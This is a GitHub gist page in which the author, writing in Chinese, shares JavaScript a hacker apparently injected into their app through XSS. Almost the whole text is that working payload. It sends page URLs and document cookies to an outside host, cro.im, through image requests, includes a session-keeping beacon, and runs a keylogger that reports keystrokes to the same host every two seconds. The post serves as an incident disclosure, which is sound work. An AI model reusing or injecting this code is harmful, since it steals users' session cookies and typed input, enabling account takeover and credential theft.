Created
March 23, 2015 02:45
-
-
Save FrankFan/d998ba3afe5cce3319ab to your computer and use it in GitHub Desktop.
记一次被XSS的经历
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * 被黑客xss的一次经历,下面是黑客嵌入到app内的代码 | |
| */ | |
| //http://cro.im/m | |
| (function() { | |
| (new Image()).src = 'http://cro.im/index.php?do=api&id=IBkpf0&location=' + escape((function() { | |
| try { | |
| return document.location.href | |
| } catch (e) { | |
| return '' | |
| } | |
| })()) + '&toplocation=' + escape((function() { | |
| try { | |
| return top.location.href | |
| } catch (e) { | |
| return '' | |
| } | |
| })()) + '&cookie=' + escape((function() { | |
| try { | |
| return document.cookie | |
| } catch (e) { | |
| return '' | |
| } | |
| })()) + '&opener=' + escape((function() { | |
| try { | |
| return (window.opener && window.opener.location.href) ? window.opener.location.href : '' | |
| } catch (e) { | |
| return '' | |
| } | |
| })()); | |
| })(); | |
| if ('' == 1) { | |
| keep = new Image(); | |
| keep.src = 'http://cro.im/index.php?do=keepsession&id=IBkpf0&url=' + escape(document.location) + '&cookie=' + escape(document.cookie) | |
| } | |
| ; | |
| ; | |
| ; | |
| var ks = ''; | |
| document.onkeypress = function(e) { | |
| get = window.event ? event : e; | |
| key = get.keyCode ? get.keyCode : get.charCode; | |
| key = String.fromCharCode(key); | |
| ks += key; | |
| } | |
| window.setInterval(function() { | |
| new Image().src = 'http://cro.im/jilu.php?lj=007&log=' + ks; | |
| ks = ''; | |
| }, 2000); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment